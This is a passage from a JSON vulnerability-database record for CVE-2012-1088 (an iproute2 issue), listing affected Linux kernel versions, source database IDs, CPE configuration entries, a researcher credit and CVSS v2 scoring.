        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.5"
      },
      {
        "model": "kernel 2.6.39-rc3",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel -rc7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28"
      },
      {
        "model": "kernel 2.6.25-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.22"
      },
      {
        "model": "kernel 2.6.32-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.14"
      },
      {
        "model": "kernel 2.6.32-rc2",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15-27.48"
      },
      {
        "model": "kernel git",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.216"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.25"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.24"
      },
      {
        "model": "kernel -rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24"
      },
      {
        "model": "kernel rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.26"
      },
      {
        "model": "kernel 2.6.33-rc6-git5",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 2.6.28-rc7",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19.3"
      },
      {
        "model": "kernel 2.6.34-rc6",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.5"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.1"
      },
      {
        "model": "kernel rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.12"
      },
      {
        "model": "kernel -rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "kernel rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17"
      },
      {
        "model": "kernel rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.7"
      },
      {
        "model": "kernel 2.6.20-rc2",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel git3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21"
      },
      {
        "model": "kernel rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.10"
      },
      {
        "model": "kernel rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.3113"
      },
      {
        "model": "kernel 2.6.32-rc4",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.38.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.12"
      },
      {
        "model": "kernel rc7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18"
      },
      {
        "model": "kernel rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.7"
      },
      {
        "model": "kernel -git8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21"
      },
      {
        "model": "kernel rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.14"
      },
      {
        "model": "kernel rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.1"
      },
      {
        "model": "kernel -git5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20"
      },
      {
        "model": "kernel rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.3"
      },
      {
        "model": "kernel git",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.217"
      },
      {
        "model": "kernel 2.6.37-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 2.6.24-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.39"
      },
      {
        "model": "kernel 2.6.32-rc5",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.22"
      },
      {
        "model": "kernel rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18"
      },
      {
        "model": "kernel rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13"
      },
      {
        "model": "kernel rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24"
      },
      {
        "model": "kernel rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21.2"
      },
      {
        "model": "kernel 2.6.34-rc5",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21"
      },
      {
        "model": "kernel 2.6.38-rc7",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel -rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.26.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.7"
      },
      {
        "model": "kernel 2.6.38-rc4",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.1"
      },
      {
        "model": "kernel 2.6.21-rc6",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel rc7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.51"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18.5"
      },
      {
        "model": "kernel -git13",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.37.2"
      },
      {
        "model": "rapid deployment pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.6"
      },
      {
        "model": "kernel rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23"
      },
      {
        "model": "kernel -git8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.29"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.46"
      },
      {
        "model": "kernel -rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.1"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16"
      },
      {
        "model": "kernel rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17"
      },
      {
        "model": "kernel -rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19"
      },
      {
        "model": "kernel 2.6.21-rc3",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel -rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17"
      },
      {
        "model": "kernel -rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.8"
      },
      {
        "model": "kernel 2.6.33-rc4",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 2.6.33-rc7",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.28"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.52"
      },
      {
        "model": "kernel rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.29"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.10"
      },
      {
        "model": "kernel 2.6.21-rc5",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.2"
      },
      {
        "model": "kernel rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.12"
      },
      {
        "model": "kernel rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.3"
      },
      {
        "model": "kernel rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.2519"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.4"
      },
      {
        "model": "kernel rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18.6"
      },
      {
        "model": "kernel 2.6.36-rc6",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.53"
      },
      {
        "model": "kernel rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.41"
      },
      {
        "model": "kernel 2.6.34-rc2",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.49"
      },
      {
        "model": "kernel -rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27"
      },
      {
        "model": "kernel 2.6.28-rc6",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21.6"
      },
      {
        "model": "kernel 2.6.35-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel -rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.26.3"
      },
      {
        "model": "kernel -rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.1613"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.31"
      },
      {
        "model": "kernel 2.6.34-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.29"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.6"
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.10"
      },
      {
        "model": "kernel rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.3"
      },
      {
        "model": "kernel 2.6.29-rc2-git1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 2.6.32-rc7",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.44"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.32"
      },
      {
        "model": "kernel rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.14"
      },
      {
        "model": "kernel 2.6.38-rc2",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.13"
      },
      {
        "model": "kernel -rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.19"
      },
      {
        "model": "kernel rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.22"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "kernel 2.6.37rc",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.14"
      },
      {
        "model": "kernel rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.35.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.4"
      },
      {
        "model": "kernel rc7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.4"
      },
      {
        "model": "kernel -rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.33"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23"
      },
      {
        "model": "kernel -rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.26"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.5"
      },
      {
        "model": "kernel rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.13"
      },
      {
        "model": "kernel 2.6.31-rc8",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23"
      },
      {
        "model": "kernel 2.6.28-rc4",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.315"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.1627"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30.4"
      },
      {
        "model": "kernel -rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.20"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.26.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.34.3"
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27"
      },
      {
        "model": "kernel -rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "52185"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2012-006150"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201202-497"
      },
      {
        "db": "NVD",
        "id": "CVE-2012-1088"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:iproute2_project:iproute2:3.1.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:iproute2_project:iproute2:3.0.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:iproute2_project:iproute2:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "3.2.0",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2012-1088"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Vasiliy Kulikov",
    "sources": [
      {
        "db": "BID",
        "id": "52185"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201202-497"
      }
    ],
    "trust": 0.9
  },
  "cve": "CVE-2012-1088",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "MEDIUM",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 3.3,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 3.4,
            "impactScore": 4.9,
            "integrityImpact": "PARTIAL",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "LOW",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:L/AC:M/Au:N/C:N/I:P/A:P",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Local",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 2.1,
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2012-1088",
